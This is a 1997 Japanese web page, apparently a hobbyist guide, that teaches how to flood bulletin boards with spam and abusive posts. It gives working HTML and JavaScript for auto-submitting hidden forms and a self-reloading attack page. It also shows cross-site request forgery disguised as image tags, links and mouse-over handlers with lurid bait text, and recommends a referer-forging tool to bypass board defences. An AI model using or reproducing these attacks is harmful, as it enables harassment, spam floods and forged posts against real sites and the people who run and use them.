掲示板物量アタック 外部フォーム・イメージタグ悪用方法

ボタン・外部フォーム

どこかの掲示板の投稿の中に、

こんなボタンが貼り付けてあるのを見かけられたと思います。(このボタンは作動しません)
これは<form>を使ってターゲット掲示板にあらかじめ用意された(たとえば「死ね死ね死ね」というような)メッセージを送り付けるhtmlスクリプトです。ソースはこんな感じです。

<script language=JavaScript>
function Warning()
{
document.frm1.sbmt.click();
return true;
}
</script>
<body OnLoad=Warning();>
<form name=frm1 method=post action=ターゲットcgiのURL>
<input type=hidden name=action value=regist>
<input type=hidden name=name value=適当な名前>
<input type=hidden name=email value=適当なメールアドレス>
<input type=hidden name=subject value=適当な題名>
<input type=hidden name=value value=適当な文章>
<input type=submit name=sbmt value="押してみよう">
</form>
</body>

 

これはターゲットとされた掲示板によって一部違ってくる物なのでこのスクリプトですべての掲示板に書き込み攻撃が出来るわけではありません。<script>タグはJavaScriptで、このフォームが貼ってある所を見た人が「押してみよう」ボタンを押さなくっても自動的に送信されてしまうように設定するものです。


この方法の特徴

ただし、現在のほとんどの掲示板は<script><body>などのタグが貼り付けられないので、このスクリプトはあまり使い物になりません。その時は・・


自分のパソコンに攻撃用のhtmlを作って、自動リロードさせる・・・なんて方法もあります。

<html>
<meta http-equiv=refresh content="3; url=このhtmlの名前.htm">
<head><title>自動攻撃フォーム</title></head>

<body OnLoad=document.frm1.submit();>
<form name=frm1 method=post action="ターゲットcgiのURL">
<input type=hidden name="action" value="regist">
<input type=hidden name="name" value="なまえ">
<input type=hidden name="email" value="E−Mail">
<input type=hidden name="subject" value="サブジェクト">
<input type=hidden name=value value=適当な文章>
<input type=submit value=" 投稿 ">
</form>
</body>
</html>

この場合はjavaで自動投稿しながら、metaタグでフォームhtmlをリロードさせています。javaでリロードもさせられますけど、書くとやる人いるから、自分で考えてください(笑)。このフォームの場合、100回くらいリロードするとメモリフローで落ちます。

外部書き込みになるので、refererを誤魔化さないと書き込めませんから、ガブリエナイを使います。


イメージ見せかけタグ

<form>が、書かれた内容を送信する方法には2つあります。ひとつはURLにくっつけて送信するもの(get)、もうひとつはURLと別に送信するもの(post)です。これは、<form>中の、「method」で指定されています。

getの場合、内容はURLに付加されて送信されるので、ブラウザのURL欄は送信後こんな感じになっているはずです。

http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章

実際には日本語はデコードされて「%1%2%3」の様に表示されています。postの場合は内容はURLと別に送信されているので、URL欄は送信後も変わりません。

大概の掲示板でmethodはpostですが、実はほとんど、

postが指定されてる掲示板ではgetでも投稿できてしまう

のです!最新版のminibbsなどでは出来なくなってますが・・。

これを利用して、掲示板に自動投稿するのが「イメージ見せかけタグ」と呼ばれる物です。

<img src="http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章">

また、リンクに見せかける事も出来ます。

<a href="http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章">☆すべてタダ!極悪えっち画像☆</a>

リンクの場合、

<a href="" onMouseOver="location.href='http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章'">☆すべてタダ!極悪えっち画像☆</a>

と、JavaScriptを追加してやればリンクの上をマウスカーソルが通過しただけで自動書き込みさせることも出来ます。この場合はリンク部分の文(すべてタダ!極悪えっち画像☆)はなるべく横いっぱいに表示させます。

この方法の特徴

でも・・・

カキコ出来ない場合・・。そのターゲットはHTTP_REFERERの環境変数で外部書き込みかどうかチェックしているのでしょう。これは通常の方法ではどうする事も出来ません。一般的な対策テクニックです。

しかし、あるアプリケーション・・・・そう、Gabrielを使えば軽くクリアできました。ただGabrielにはちょっとしたイタズラが仕掛けてあったので(あるアドレスに環境が記載されたメールが送られるとか・・。製作者はメールボム食らったようなメール量だったとか言ってました)現在は爆弾抜きバージョン、Gabrienaiを公開しています

→Gabrienaiダウンロードページ


戻る

(C)1997 代参神道教師・アリス=リデル
All rights reserved.